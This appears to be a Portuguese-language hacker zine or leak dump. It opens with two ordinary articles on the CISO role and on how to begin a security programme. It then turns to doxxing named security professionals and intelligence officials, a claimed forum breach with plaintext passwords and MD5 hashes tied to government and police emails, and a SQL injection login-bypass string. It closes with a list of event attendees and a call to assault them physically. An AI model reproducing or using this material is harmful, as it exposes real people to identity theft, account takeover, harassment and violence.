rodrigo.macedo@gmail.com -- Os dentes do CISO CISO - Chief Information Security Officer Os dentes do CISO podem ser as defesas ou as pontas que formam as engrenagens. Mas como afiar os dentes do gestor de segurança da Informação? Nos dias de hoje, novas atribuições surgiram para suprir as regulamentações de mercado referentes a segurança da informação, como controles para mitigar os riscos, controles de acesso com privilégio mínimo, sistemas e processos menos sucetíveis a fraudes, segregação de função, além do gerenciamento dos recursos de segurança para garantir a defesa dos negócios. A responsabilidade dos gestores de segurança da informação depende dos requerimentos de cada empresa, orçamento, estrutura hierárquica. No Brasil, o acrônimo mais conhecido é o CSO - Chief Security Officer, seja pelo sonoridade, seja pela cadeia CEO, COO, CFO, CIO, CTO, e também o não menos importante CRO - Chief Risk Officer. O CSO deve tratar das estratégias de segurança, enquanto o CISO trabalha no nível tático, combatendo e ordenando as tropas em posições favoráveis. Ainda temos o Analista de Segurança que trabalha no nível operacional, administrando os ativos de segurança para proteção do perímetro, monitoramento, gestão de identidade, resposta a incidentes, detecção e proteção contra intrusão e vírus, identificação de vulnerabilidades, backup/recovery etc. A responsabilidade do CSO pode incluir, mas não está limitada à proteção dos executivos, investigações, verificações das referências pessoais, proteção da propriedade intelectual , treinamento de segurança, prevenção à fraudes e espionagem, continuidade dos negócios, privacidade, auditorias de sistema, e finalmente segurança de informações. E por que não segurança do trabalho e patrimonial? O CSO, por fatores culturais, normalmente surge da área de Tecnologia da Informação, mas este profissional também pode ser oriundo das áreas de auditoria, jurídico, segurança corporativa e também da carreira militar. O CISO deve ter foco nas informações críticas para o negócio, para garantir a disponibilidade, a integridade e a confidencialidade, e a sua formação depende da experiência, certificações e formação acadêmica. Mas o CISO deve ser um especialista em identificar as ameaças. Para tanto, deve conhecer profundamente as vulnerabilidades, os riscos e as contramedidas de segurança para proteger e atender os requerimentos de segurança do negócio. Para afiar os dentes do CISO, é necessário conhecer as novas tecnologias, como telefones celulares com câmera, dispositivos portáteis de armazenamento, dispostivos sem fio, serviços de compartilhamento de arquivos na Internet e também as técnicas hacker, análise de malwares, desenvolvimento e reengenharia de sistemas, linguagens de programação, redes de comunicação de dados, criptografia, sistemas operacionais, análise forense, resposta e apuração de incidentes, controles e contramedidas, recuperação de desastres e contingências, relação jurídica com tecnologia, elaboração e divulgação de políticas de segurança e principalmente treinamento para os funcionários, inclusive da área de TI. Então, o CISO também deve ser treinado? Sim, sempre! Seja através de livros, cursos presenciais, listas de discusão, websites e eventos especializados. A alta gerência deve considerar o treinamento em segurança como investimento prioritário ou então buscar a terceirização de segurança em empresas especializadas. Estudar os domínios CBK® - Common Body of Knowledge organizados pelo (ISC)² - International Information System Security Certification Consortium também é uma excelente oportunidade para desenvolvimento profissional dos gestores de segurança, seja CSO, CISO ou analistas de segurança: Práticas de Gestão de Segurança Controle de Acesso Arquitetura e Modelos de Segurança Segurança Física Segurança de Telecomunicações e Redes Criptografia Plano de Continuidade de Negócios Leis, Investigações e Ética Desenvolvimento de Aplicações e Sistemas Segurança de Operações Então nós, profissionais de segurança da informação, devemos aprender, aprender e aprender e depois ensinar, ensinar e ensinar! Luiz Firmino ISSA - Diretor de Relacionamento -- Como começar um trabalho de segurança Como começar um trabalho de segurança? Por Augusto Quadros Paes de Barros A espinha dorsal de um bom trabalho de segurança com certeza é a análise de risco. Sem ela, corremos o risco de tratar aquilo que é menos importante. Porém, não é sempre que podemos começar por ela. O mundo não para, esperando que tenhamos nossa análise pronta dizendo "o crítico é isso!". Além disso, há outros pontos, como imagem, política, etc, que contam no momento de escolher as primeiras ações. Eu pessoalmente vejo um misto de ações "p/ a torcida", com o intuito de ajudar na imagem da área de segurança (é importante!) e de ações emergenciais, como instalação de patches críticos ou até mesmo alteração de uma senha aqui ou acolá. Depois, ou melhor, em paralelo, inicia-se um trabalho de entendimento da empresa. O que ela faz? P/ onde ela quer ir? O que a ameaça, em termos de negócio? Quais seus principais processos (por cima!)? Como é a tecnologia que apóia tudo isso? Quem são as pessoas e funções chave? Com isso é possível, para o bom consultor de segurança, identificar os pontos mais perigosos. O trabalho pode usar como base alguma norma de cálculo de risco, como a NIST 800-30. Sendo simplista: RISCO = VULN x IMPACTO Aonde o VULN seria a probabilidade de uma ameaça se concretizar através da exploração de uma vulnerabilidade. Vejam que falamos de ameaça, e um bom pedaço de dessa informação vêm do negócio. Tomemos bancos como exemplo. Se estivermos pensando na ameaça de fraude por parte de desenvolvedores internos, por exemplo. O quanto que isso é comum? Há casos aonde isso acontece no mercado financeiro? Em termos de fraude financeira, qual a facilidade do cara fazer isso? Acho que são informações que só sairão de uma conversa com pessoas de negócio (estou incluindo operações), habilmente conduzida por um bom consultor de segurança. O IMPACTO é outro componente simples se não houvesse o problema de processos e sistemas interligados. Há também as diversas variantes quanto ao aspecto de segurança atingido (C, I, A). A pessoa de negócio pode enxergar o impacto do comprometimento da confidencialidade (é o que mais simples de ver), mas será que ele consegue pensar nos impactos referentes à integridade e disponibilidade sem a ajuda de um profissional? Tentar simplificar isso com classificações acaba levando a classificações demasiadamente complexas, o que sabemos que não funciona. E quanto aos controles de COBIT, COSO, ISO17799, etc? Por que não devo simplesmente aplicá-los, se é isso que todas as palestras por aí dizem?? Por que não é só isso! Aquilo tudo são processos e ferramentas para trabalhar a maturidade da segurança, mas não é o principal, e principalmente, não é começo, como muita gente está pensando. Eu sou do time que não acredita em checklists mágicos. Se eles existissem, com certeza teríamos a super-norma que resolveria os problemas de segurança de todo mundo. Que pena (ou que sorte p/ nós!) que não é assim. Em TI existe o papel do Analista de Sistemas, ou Business Analyst ou sei-lá-que-nome, aquele cara que entende os requisitos do negócio e passa p/ a fábrica de software desenvolver em uma linguagem já uniforme e padronizada. Se uma tarefa como construção de software ainda requer uma pessoa com essa inteligência, por que não seria necessário ter o mesmo papel quando o assunto é segurança? O que torna os requisitos de segurança tão diferentes a ponto de que podem ser entendidos de maneira mais simples que um requisito de software? A abordagem atual em construção de software é que o analista saiba a linguagem do negócio, pois ele vai captar melhor os requisitos. A pessoa que vai usar o software não precisa fazer se o que ele quer é um combo box ou um text box, o analista entende a necessidade. Já tentaram simplificar bastante esse processo, há várias ferramentas, mas ninguém tentou retirar a inteligência (como vivem tentando fazer em segurança!). A segurança não pode ser tão pretensiosa a ponto de acreditar que vai "pasteurizar" todos os negócios para receber os requisitos sempre da mesma forma e bem definidos. O negócio não faz isso com outras disciplinas, e não vai fazer conosco. Ele existe por si próprio. Nós não. Nós existimos por causa dele. Aí está a resposta de porque devemos ir até ele, e não o contrário. ------------------------------------------------------------------------------------------------------------ 6; infos pessoais (Nelson Murilo, souzadc, Sergio Amadeu, Denny Roger, Augusto Paes de Barros, André Fucs, Adriano Cansian, Demi Getschko e ABIN) ------------------------------------------------------------------------------------------------------------ NELSON MURILO DE OLIVEIRA RUFINO <---- 1NF0RM4NT3 D4 P0LÍC14 F3D3R4L CPF: 306.030.801-20 Data de nascimento: 29/06/1963 Nome da mãe: Maria Helena Oliveira Rufino Endereços: QE 20 BL G AP 102 - Guará I, Guará DF CEP 71015077 SQN 105 BL F AP 104 - Asa Norte, Brasília DF CEP 70734060 SQN 208 BL B AP 504 - Asa Norte, Brasília DF CEP 70853020 Telefones: 61 33817356 - 61 35686960 - 61 35686946 - 61 2721908 - 61 81116294 - 61 92712122 LUIZ FERNANDO DE SOUZA JUNIOR (souzadc / forum-invaders.com.br / forum-invasao.com.br / forcehacker.com) CPF: 949.435.085-53 PS: PaRaBÉns à Luzinha (Invaders) p0r t3r uMa X0X0t4 e uM cÉr3br0 nã0 fuNc10n4l SERGIO AMADEU DA SILVEIRA RG: 6.860.391-5 SSP/SP CPF: 050.990.258-89 DENNY ROGER SANTOS CPF: 259.499.068-02 Data de Nascimento: 01/12/1976 Nome da mãe: ALZIRA ALVES DOS SANTOS <--- Qu3r0 c0m3r O FeIjÃO DA DONA ALZIRA!11!!! HUUAEHUEWWUIHAUEHAEOA Endereços: Av Bezerra de Menezes 282 - Alves Dias - São Bernardo do Campo, SP - CEP 09851130 Rua Corgie Assad Abdalla 1000 AP 51 - Vila Sônia - São Paulo, SP - CEP 05622010 Telefones: 11 98051546 - 11 32517562 - 11 81014476 - 11 35019498 login secforum.com.br: denny senha secforum.com.br: chocimol <--- ¿Qu3 d14b0s d3 s3nh4 É esSA? n0m3 d3 r3Méd10? ANDRÉ FUCS DE MIRANDA CPF: 002.515.237-80 Data de nascimento: 11/04/1978 Endereço: Eduardo Santos 134, Santa Tereza - Rio de Janeiro, RJ (agora tá em Sydney, Austrália) Nome da mãe: Maria Elisa Fucs Miranda CEP: 20240-290 ADRIANO MAURO CANSIAN CPF: 138.716.608-50 Data de nascimento: 20/05/1966 Nome da mãe: Odila Maria Barbieri Cansian Endereço 1: Avenida S Carlos 2724 AP 303 - Centro - São Carlos, SP Endereço 2: Rua Frei Caneca 750 BL A AP 1171 - Cerqueira César - São Paulo, SP Telefones: 16 33749816 e 11 32117061 DEMI GETSCHKO (o p4i da iNTerNeT d0 BR4S1L) RG: 5.490.048 SSP/SP CPF: 829.487.988-68 Endereço: Rua Geraldo Amorim 216 Jardim Pinheiros - São Paulo SP Telefones: 11 37354863 e 11 37357179 (-*-)oOoOoOoO ABIN ABIN ABIN ABIN ABIN ABIN ABIN oOoOoOoO(-*-) GERALDO DANTAS DA SILVA CPF: 14394308100 Nascimento: 17/06/1957 Nome da mãe: Candida Dantas da Silva Endereco: Super Quadra Norte 111 Asa Norte - Brasília DF CEP: 70754010 Telefone: 61 33407383 e 61 34458379 ANTONIO MAGNO FIGUEIREDO DE OLIVEIRA CPF: 21424268168 Nascimento: 05/04/1960 Nome da mãe: Maria do Socorro Oliveira Telefone: 61 33400785 Endereço: SQN 105 Bl-F Ap-104 Asa Norte - Brasília DF CEP: 70734060 YOSHIHISA KAWANO CPF: 07296380144 Nascimento: 01/07/1952 Nome da mãe: Yoko Kawano Telefone: 61 32236649 ou 61 61913889 ou 61 32423971 Endereco: SQS 302 D ou SEPS 705/905 BL C SL 405 Plano Piloto - Brasília DF CEP: 70338040 ou 70390055 ----------------------------------------------------------------------------------------- 7; invasao.com.br && forum-invasao.com.br 0wn3d ----------------------------------------------------------------------------------------- $ uname -a Linux web-srv01.forum-invasao.com.br 2.6.21-1.3228.fc7 #1 SMP Tue Jun 12 15:37:31 EDT 2007 i686 $ echo "i g0t 0wn3d" i g0t 0wn3d S3m fr3sCur4s v4m0s a0 Que iNt3r3ss4 CUIDADO: POLICIAIS INFILTRADOS EM FORUNS HACKERS!!! CUIDADO: POLICIAIS INFILTRADOS EM FORUNS HACKERS!!! CUIDADO: POLICIAIS INFILTRADOS EM FORUNS HACKERS!!! waldayr:danielle (waldayr.wad@dpf.gov.br) DPF DANIEL:171276 (daniel.dvv@dpf.gov.br) nister:secretario (chefepcs8bpm@pm.es.gov.br) staff invasão marcosflavio:190594 (marcos@invasao.com.br) <--- M4RC0S FLÁV10 4SSUNÇÃ0 QU3 S3NH4 R1DÍCUL4 H4H4 andre:378011 (andre@invasao.com.br) lg:cobra (gustavo@invasao.com.br) Psycho:172376 (Psycho@invasao.com.br) De: Fuctura Para: marcosflavio Enviada: Sáb Mai 21, 2005 1:47 pm Assunto: atencao Citar Mensagem Marcos isso vai atrapalhar a venda de cursos e dai n vamos chegar a nenhum acordo para compra. Preciso vender 10 para que vc tenha o seu e eu o meu. Seu nome n vai ser mais usado como instrutor, mas tb n ha necessidade de informar isso dessa forma. Peco q se alguem informar ou mandar email vc diga q n pode da mais o curso. De outra forma so vi prejudicar o curso e dai prefiro n te pagar e cancelar tudo. Pessoal, Só pra constar, eu não sou mais instrutor do curso online do invasão. Vou continuar ajudando o site com colunas de vez em quando e fazendo algumas visitas às vezes ao fórum, mas só... estou negociando com o Diógenes a venda das minhas video-aulas que ele usa no CD enviado aos alunos, assim ele terá os direitos sobre elas. Estou escrevendo isso para avisar que quem quiser pode continuar me enviando e-mails para tirar dúvidas, mas não mais como instrutor, então, responderei somente quando puder. De: Adriano Leite Pereira Para: marcosflavio Enviada: Dom Mai 22, 2005 7:54 pm Assunto: Ola Marcos Citar Mensagem Primeiramente, parabéns pelo seu primeiro e segundo livro no Desafio Linux Hacker os niveis que achei mais interessantes foi do 7 ao 13. Eu queria que você me explicasse melhor a técnica do man in the middle e a técnica que você citou em uma parte do seu livro Desafio Linux Hacker que se não me engano é a técnica hjack é uma coisa assim. Muito obrigado. De: marcosflavio Para: abobre Enviada: Ter Abr 26, 2005 11:23 am Assunto: Re: LIVRO e ae.. Eu ando meio apertado pq estou fazendo 2 livros... mas espero que logo logo eu termine e eles sejam publicados.. mas tenho previsão não De: marcosflavio Para: baldim Enviada: Qui Abr 07, 2005 4:02 pm Assunto: Re: Scan a ser usado! Bons scanners: Windows Superscan ShadowScan ShadowSecurityScanner Retina Wingate scanner Languard Linux Nmap Nessus De: marcosflavio Para: prota Enviada: Qui Abr 07, 2005 4:01 pm Assunto: Re: Uma ajuda por favor. Você quer visualizar as senhas? se for, o código é esse, colocado no nome de usuário e senha: ' or ''=' Abraço aQui vã0 AlGunS h4shS p4Ra v0CêS s3 diV3rTir3m. a LisT4g3M c0mpl3tA s3 EnC0ntr4 n0 3ndEr3ç0 http://rapidshare.com/files/117316485/hash-forum-invasao.txt.html n0t3 n4 QuAntid4d3 d3 p3ss04s d0 g0v3rn0 e h4ck3rs f4m0s0s (Mitnick e Phiber Optik) hAUEHHaue cc11f7ea5b5d45adf6a9ce63d554e9cb Luiz luiz@fuctura.com.br 347e44efaf7ed37d629c58a7770d263f Fuctura diogenes@fuctura.com.br <--- 0 p0d3r0s0 ch3fã0 edf7a553d3f85ac324e1826f8726e992 ChapaBranca chapa_branca@hotmail.com 44deedf5df3c05af0697e504a5fd3a8f Frogger roger.olmos@uol.com.br 3856da659816d1ebd5cb6aa8feca8b27 Marcus Pinto usinadejogos@usinadejogos.com.br ea9fbba05d86dc9c927e2a75ca0f4e43 helmerpaiva helmerpaiva@yahoo.com.br 74048fe3ce86f588f38ad7d2e4fa7d56 ccsampaio ccsampaio@hotmail.com c62d929e7b7e7b6165923a5dfc60cb56 maxsecure rodrigo@maxsecure.eti.br c4fae89dc09afac4d2a7930eb9e6b666 marcosflavio marcos@invasao.com.br <--- G0rD0 h4ck3r JEDI e323d40b6845fd7016304e6bf22a5089 lematrix lematrix@hotmail.com 9e07d283cc5670a6c3668d4e2ee4427a fmaciel francisco.maciel@gmail.com 91022ad929eaa50da47fb4d9e820b6cc renurf renato.bovespa@terra.com.br ae48b5cee14c1de74ca7d636261f61da Fire alexeinstrutor@uol.com.br 263fe4a17a6c94007af2bda7a5fab907 souzaleaoadm souzaleaoadm@hotmail.com 7072affd95026f5d393861572b51cc48 souzadc souzadc@gmail.com <--- INVADERS OF THE NET AHHAHAAHAH cfc97a4c76280e545e3a87eceaf764a4 Luzinha luzinha_do_invasao@hotmail.com <--- INVADERS OF THE NET 763103e0d99fe9fa76b44a941e30ce62 nerdpaulista nerdpaulista@gmail.com 763103e0d99fe9fa76b44a941e30ce62 nerdpaulistano johnny_miranda_6@hotmail.com 463ec596ad9d2dddf853799012102623 Tking thorking171@hotmail.com 0ea24c14f0169c0b7c61dcb1d70e34fb ThorKing thorking@gmail.com <--- SUP3R H4CK3R TH0RK1NG!!1!! 42501d73723782a33ef3a1f29002daf5 Maksoel zerocoll@thewebhacker.com <--- Z3R0 C00L H4HH4AHA 66a9d7a051e63015814806fafab55594 fabricioferreira fabricio@saude.go.gov.br 52a857f666b5fe9c6a19628b37d65f2f jvoloski john-voloski@sedai.rs.gov.br 23cbeacdea458e9ced9807d6cbe2f4d6 israellp israel@lagoadaprata.mg.gov.br 91d11a12852f73e1918b622e2021d5ea aortolane aoa@tjpe.gov.br 5c44192424cd65816b3adf0ef7e03cca Marcel marcel@balsas.ma.gov.br de2927fe03e140654249d6afd92d6049 icecool fabio@guaruja.sp.gov.br 00a759f5d16ea1c3009df6c8312b3596 fabiojvc fabio.fjvc@dpf.gov.br <--- PULIÇA FEDERAU 8f8d3d04ecf00af46dd4eaca9a85a26f silent-m4n gleison@detran.pa.gov.br 827dc84026f30039f73f7baeba96c76a agrll livre@alba.ba.gov.br 2655e0d4397dc758acfbbbfff348ede2 marden_pimenta marden@eln.gov.br 6a5e73fce6b684210292e353f2e6f8b3 Cps.rbf cps.rbf@tre-ms.gov.br 539f584088c00759c6445ab193f55ea6 ibernardi igor@pmpf.rs.gov.br 6c8fa2927216ca54571abed0f9890959 rmota ronaldo.mota@cade.gov.br 6085e3701e3702f9bdce3134815e26a0 maxwell.goncalves maxwell.goncalves@camara.gov.br <--- h0h0h0h0 69207193b25a07c9bd387dad6fcf8bea papi papi@polmil.sp.gov.br <--- PULIÇA CIVIU 450c89f9bc2655de68cf2a2ce6c1131c atamer atamer@pmro.rj.gov.br 4d3130f25e93609b40d1167b0dd930b0 handrew18 andres@fnde.gov.br <--- g0v3rn0 f3d3r4l 28a6c94ba31775648ae6b7178a360cde renato.strauhs renato.strauhs@previdencia.gov.br <--- INSS :( 5cbd003bf7123e0e8e1971f21fa2ea1b mayra mayra@mre.gov.br a68001dca531fb348a84767f75f1856c profeta adacir.junior@caixa.gov.br 2087842a67a758d0f17228fd49ac4bd1 Granamir eduardo.alberto@dprf.gov.br <--- PULIÇA R0DOVIÁR1A c33959119ac5803315b7145ad25e48ea pcmagurno pcmagurno@polmil.sp.gov.br <--- PULIÇA MILITAR 9f5a44a734ac9e43b5968d0f3b71d69b acaraje compras@ceplac.gov.br 945fe30ccfc289a3adba237417f7a28a leandro_legiao leandro.santos@ibama.gov.br d4ad10396e237d785e66d4f947bd2b3f fonfon fonteboa@cbtu.gov.br c33dd1c6b2e6b2c5b3dd6f980273006d MADSEA moacir@policiacivil.pe.gov.br <--- PULIÇA CIVIU e10adc3949ba59abbe56e057f20f883e fernando123 fernando.borges@dprf.gov.br 03253b33f1ea7898ad3ccc81853e4a36 inteligenciamitnick <-- INTELIGÊNCIA MITNICK AUEUAEHAHAUHEAUEH 1df8f8afc0a58cea6ecc0d4bf7988627 Kevin Mitnick kevin_mitnick@mail.com <-- K3V1N M1TN1CK 1ceb38856504fb231bc24d2ea690d312 Mitnick azausk@click21.com.br 7242d6c91121f8e2e87803855c028e55 Phiber 4optik@gmail.com <--- Phiber Optik ----------------------------------------------------------------------------------------- 8; superlista de white hats para você fazer rm -rf ----------------------------------------------------------------------------------------- aQui v4i a LiStaGem eXtraÍD4 d0s enc0ntr0s GTER d0 NIC/CERT (todos os direitos reservados) Se v0cê vER n4 RuA AlGuM d3ss3s, s3 v0Cê tr4b4lhA c0m 4lguÉm d4 liStA 0u c0nh3cE alGum r3t4rd4d0 m3nt4l QuE 4ssiTiu a eStes eVent0s, aGrida fiSic4m3nte 0 deSgraÇ4d0 quE elE m3rEce. Acacio Alves Dos Santos Digizap Addy Magalhaes Cunha Instituicoes Arnaldo Janssen <--- d4 f4míLia d0 Kl4us? Adriano Mauro Cansian ACME! Computer Security Research <---- W000000000WW Agnaldo Yoshida Terra Networks Albert Viana Alessandro M. S. Sant Anna EMBRAER - Empresa Brasileira de Aeronaut Alessandro Vivas Andrade UFVJM - LabCom/UFMG Alexandre Amaral dialdata Alexandre de Oliveira Silva Soares Way TV Belo Horizonte S/A Alexandre Graff Extreme Networks Alexandre Neves Seven Internet Alexandre Paraguassu Way Brasil S.A Alexandre Paulo Pires da Silva Briskcom Alexandre Sauer Paes Leme PRODABEL S/A Alexandre Xavier de Oliveira Macedo Banco Mercantil do Brasil Alison Carmo Arantes International Syst Alvaro Tomaz da Silva Junior GASMIG Amado Emanoel Ribeiro Safe Security <---- W000000000WW Anderson Goulart Ulevel Anderson Paulo Senac Anderson Quintao Squadra Tecnologia Andre Luiz Coorea Dias Empresa de Infovias S.A Andrea Oliveira Silva Senac Minas Andrea Pennacchio visualnet Andrei Rimsa Alvares MEU CONVITE Andrey Lee Cisco <---- W000000000WW Angelita Bernardes Neves Telemig Celular S/A Anna Izabel Joao Tostes Ribeiro M&S Sistemas Antonio Hamilton Magalhaes FITEC Antonio Maria Clarete Vilela Sinergia Telecomunicações Ltda Antonio Ricardo Leocadio Gomes Banco Mercantil do Brasil Armando Camara Junior INPE Arthur Aguiar LinuxPlace Artur Renato Araujo da Silva DH&C Outsourccing Ataliba de Oliveira Teixeira Atila Medeiros Leite Lintz Atos Ramos Alves Instituto SIM Bernardo Maia Rodrigues CSIRT - POP/MG <---- W000000000WW Breno Silveira Soares SERPRO Bruno Cayres Burdignon webmanagerz solucoes criativas ltda Bruno Geraldo Mendes de Oliveira Host Revenda Bruno Wallace Bernardino da Silva Alog Datacenters S/A Caio Gomes Alvim Way TV Belo Horizonte S.A. Carlos Alberto Costa AVE NETWORKS Carlos Alberto Maia Bueno Embratel Carlos Celio de Oliveira Bugoff Consultoria em Informatica Ltda Carlos Luiz Costa GAS Tecnologia Ltda Carolina Gontijo Hamdan FITec - Fundação Para Inovações Tecn Charlene Santos Infovias S.A Charles Ferreira Goncalves UFMG Chelton Roni Leon Vieira FACULDADE ESTÁCIO DE SÁ Claudia de Abreu Silva Diretoria de Telecomunicações da Marin Claudiney Magno Soares Belgo Mineira Sistemas Claudio Menezes Varanda Metodo System Claudio Pessoa Grupo ITE Cristian Latapiat Faculdade IBTA Daniel Borges Quintao Brasil Telecomunicações S/A Daniel Dias Goncalves Dgnet Network Solutions Daniel Lopes Miranda Jr Danilo Das Chagas Brasilsite Danton Nunes InterNexo Ltda. David Cukierman Petrobras David Robert Camargo de Campos Registro.br <---- W000000000WW Dhiancarlo Alessandro Ferreira Empresa de Infovias S.A. Diogo Felipe de Araujo Way Tv Belo Horizonte S/A Diogo Mazzoni Canaan AeC Dionello Andrade SENAC - MINAS Dorgival Guedes DCC/UFMG <---- W0000WW w3 0wn3d DCC/UFMG 4 an0s aTrás Douglas Alvares da Silva PRODEMGE Edesio Costa e Silva SoftAplic S/C Ltda Eduardo Honorato Metodo System Eduardo Maia Lima Grade TI Eduardo Zambaldi Seven Internet Elizabeth Cristina de Souza Emerson Pereira Banco Bonsucesso S/A Erasmo Cardoso de Faria Morais FUMSOFT Erik Paixao Amarante Federação Nacional das Cooperativas M? Euder Flavio Correa Rodrigues DCC/UFMG/POP-MG/RNP <---- W000000000WW Eugenio Maia Fonte Boa TeleSA Evarley Wagner da Fonseca Global value soluções s.A Everson Luiz Soares Instituiçoes Arnaldo Janssen Ewerson Guimaraes Hospital Felicio Rocho Fabio Roberto Viana Castro Terra Networks Fabio Sernizon Silveira Empresa de Infovias S.A. Fabricio Tamusiunas NIC.BR <---- W000000000WW Felipe de Castro Louback Rocha Belgo Mineira Sistemas Felipe Ribeiro escola de saude publica de minas gerais Felipe Tadeu Salum Barroso Task Software Ltda Felippe de Meirelles Motta FreeBSD Brasil LTDA <--- QuE P0RRA É ESSA? Ferdinando Mendes Banco Bonsucesso Fernando Alvim S. Nogueira FreeBSD Brasil Ltda <--- QuE P0RRA É ESSA? Fernando Dos Santos Camargo Mercantil do Brasil S/A Fernando Garcia de Almeida Cisco do Brasil <---- W000000000WW Fernando Ramires Santos Briskcom Business Technology Filipe Lott Torres Francisco Ardisson Victoi de Freitas FITec Inovações Tecnológicas <---- W000000000WW Frederick Pohl WayBrasil Frederico A. C. Neves Registro.br <---- W000000000WW Frederico Augusto de Morais Coelho MAPAL DO BRASIL Frederico Georg Marx CPB/Braxis Gabriel Perdigao Romano A&C Gabriel Soares Lana Fundação Cultural de Belo Horizonte - George Esteves Prodemge Geraldo Goncalves Netsol Gian Paolo La Valle Reale Dataprev Gilberto A. Sousa Infovias Giovanne Librelon de Souza Ministerio Publico Federal Guilherme Borges Rabelo UFMG-DCC <--- 0wn3d 4 anos atrás Guilherme de Freitas Figueiredo WKVE Acessoria de Informatica e Telecom Guilherme Urban Grupo ITE Guilherme Viana Carvalho Amorim UFMG-DCC <--- 0wn3d 4 anos atrás Gustavo Fernando Figueiredo NEC SOLUTIONS BRASIL SA Gustavo Guedes PRODABEL S/A Gustavo Monteiro Rocha SERPRO Hamilton Vera Maxtrack Industrial Ltda Harlen Duque Grupo VDL Heitor Motta B. de Moraes UFMG/DCC POP-MG/RNP <---- W000000000WW!!!!111 Helio Marques Sobrinho Henrique Dutra personal consultoria Henrique Otavio Suppes UNIPAC Henrique Rodrigues Pires Linux Place Hilza Miranda Barbosa Banco BMG S.A Huderson Nascimento Alencar QualiConsult Hugo Koji Kobayashi Registro.br <---- W000000000WW Hygor Cavalcante Oops Internet Igor Giangrossi Cisco <---- W000000000WW Iuri Mendonca Waybrasil Iury Teixeira Pires Junior Empresa de Infovias S/A Ivan Dornela Goulart SERPRO Jacqueline Goncalves Prodabel Jarder F. Gonzalez Junior Empresa de Infovias S.A. Jean Carlos Almeida Araujo Ministerio do Trabalho e Emprego / Polit Jefferson Maglio Intercia Jefte Silva Faculdade Estacio de Sá Jeronimo de A. Barros i2 Software <---- W000000000WW oi rora, oi ch3m0nz Joaquim Espinhara CODISE Jonas Aldoeno Soares Infovias Jorge Eduardo Quintao NetSol Jose Carlos Fiochi Junior NEC do Brasil SA Jose Luiz Marques Santana Universo Online S/A Juliane Aparecida Silva Goncalves Juliao Braga Tele SA Julio Cesar de Oliveira Pereira Drogaria Araujo Julio Cezar Figueiredo de Oliveira Fundação Cultural de Belo Horizonte Julio Marcio Dutra Couto Faculdade de Engenharia e Arquitetura da Karla Lopes Cambraia Carvalho Kennedy Aparecido de Oliveira Dias Cemig Kurt Urban S/A Estado de Minas Leandro Collares de Oliveira Cemig Distribuição Leandro da Silva Matos GLOBALVALUE SOLUCOES LTDA Leandro Machado Coelho Prodabel Leonardo Cesar Almeida Empresa de Infovias S.A. Leonardo Gomes Duarte Qualyinf ( JUCEMG ) Leonardo Henrique de Melo Leite FITec <---- W000000000WW Leonardo Henrique Machado ARCELOR MITTAL SISTEMAS Leonardo Lima Silva ACME! Security - UNESP <---- W000000000WW Leonardo Maia Lima Avanço Informática Leonardo Patricio de Carvalho Core Synesis Liane Tarouco UFRGS Lilian Noronha Nassif Prodabel Luana Coimbra Diveo do Brasil Lucas Brescia de Moura NetSol - Network Solution Lucas Goncalves Oliveira PRODEMGE Luciano Nascimento PRODABEL Luciano Pereira Gomes Fiat Automóveis S.A. Lucineia Cristina Lage SECRETARIA DE EDUCACAO Luis F Balbinot SIM Telecom Luis Felipe Cunha Martins UFMG - DCC Luiz Cosme Puppin Magalhaes Petrobras S/A Luiz Firmino da Silva Junior HSBC Luiz Gonzaga da Mata Prodabel S/A Luiz Marcelo Borges Rangel TIVIT Tecnologia da Informação S.A. Luiz Thiago Silva Way TV Belo Horizonte Manuel Pernavia Igen/Unifesp Marc Victor C Cabadas PROVEDORA CMA INTERNET LTDA Marcelo Barbosa sysecurity <---- W000000000WW Marcelo Gardini Registro.br <---- W000000000WW Marcelo H. P. C. Chaves CERT.br / NIC.br <---- W000000000WW!!!!!!!!!!!!!!!!!! Marcelo Murrer Mendonca Faculdade de Engenharia e Arquitetura da Marcelo Prates Marchiori His-Works Serviços em Informática Ltda Marcelo Teixeira Martins Filho Empresa de Infovias S.A. Marcelo Vicente Freire Alves Senac MG Marcio Lucio Pimenta Brasil Telecomunicações S.A. Marcio Luiz Silva Sa Federação do Comércio do Estado de Mi Marco Antonio Faria Botelho Univale Marco Tulio de Bessa Soares PUC Minas Marcos Flavio Araujo Assuncao MAXXI SOLUCOES Marcos Moura Coelho EMBRAER - Empresa Brasileira de Aeronaut Marcson Vilker Sefaz - Al Marcus Felipe de Souza Pereira Task Telecom Marcus Vinicius Jose de Souza Telecomdados Serviços Ltda-ME Maria de Lourdes Inacio Rosa EMBRATEL Mariana Reis Balboni NIC.br <---- W000000000WW Marius Vinicius Nunes de Miranda Empresa de Infovias S.A. Marucia de Freitas Lima Gomes Senac Matheus Santiago Leite Universidade Fumec Max Starling Valeriano Cruz Soares Santo Smart Trust Michele Alves Genova Engine C&S Milton Kaoru Kashiwakura NIC.BR <---- W000000000WW Miriam Gomes Banco Rural Murilo Couto NIC.br <---- W000000000WW Murilo Silva Monteiro UFMG/DCC POP-MG/RNP <---- W000000000WW Norton Almeida Junior Oscar Aleixo Costa Rocha LabCOM-UFMG Otavio Domingues Alencar Alcantara Centro de Recursos Computacionais - UFMG Pablo Fernandes Bittencourt Senac Palmenas Costa Diniz Disec - Security Services <---- W000000000WW Patrick Tracanelli FreeBSD Brasil LTDA <-- Qu3 p0rr4 é EssA? Paulo Cesar Soares Furiati NTW Conectividade Segura Paulo Fernando Letayf Teixeira Infovias Paulo Renato Avellar Dias Netsol Paulo Sergio Guimaraes Soares Filho ALOG Data Centers Pedro Monteiro Vieira Disec Pedro R. Torres Jr. PoP-PR/RNP <---- W000000000WW Pollyana do Amaral Ferreira POP-MG/RNP <---- W000000000WW Priscilla Maria Carvalho Silva Dias OI Rafael Dantas Justo Registro.br Rafael Ferreira Motta Alog Datacenters S/A Rafael Fonseca de Freitas Prodemge Rafael Guido Atento Rafael Guimaraes Siqueira CSIRT - POP/MG <---- W000000000WW Rafael Lucio Silva Ribeiro QualyInf ( JUCEMG ) Rafael Mendes Pereira UFRGS Rafael Miranda Guimaraes Rafael Teixeira Seven Internet Ramon Martins Pedrosa Senac Ramon Roque de Jesus CEMIG Raniery Pontes RNP <---- W000000000WW Renata Russar de Mendonca Reni de Oliveira Couto Sanitas Ricardo B Santos Empresa de Infovias/CEMIG Ricardo Fernandes Dualtec Informatica ltda Ricardo Kleber Martins Galvao NARIS/UFRN Ricardo Leite Goncalves FreeBSDBRasil <--- WHATTHEFUCK Ricardo N S Makino Faculdade IBTA Ricardo Patara LACNIC Roberson Carlos Genova Engine C&S Robert Marques Maia PRODABEL S/A Roberto Sebastiao Junqueira Santos Cemig Rodrigo Batista Vieira Way Brasil S.A. 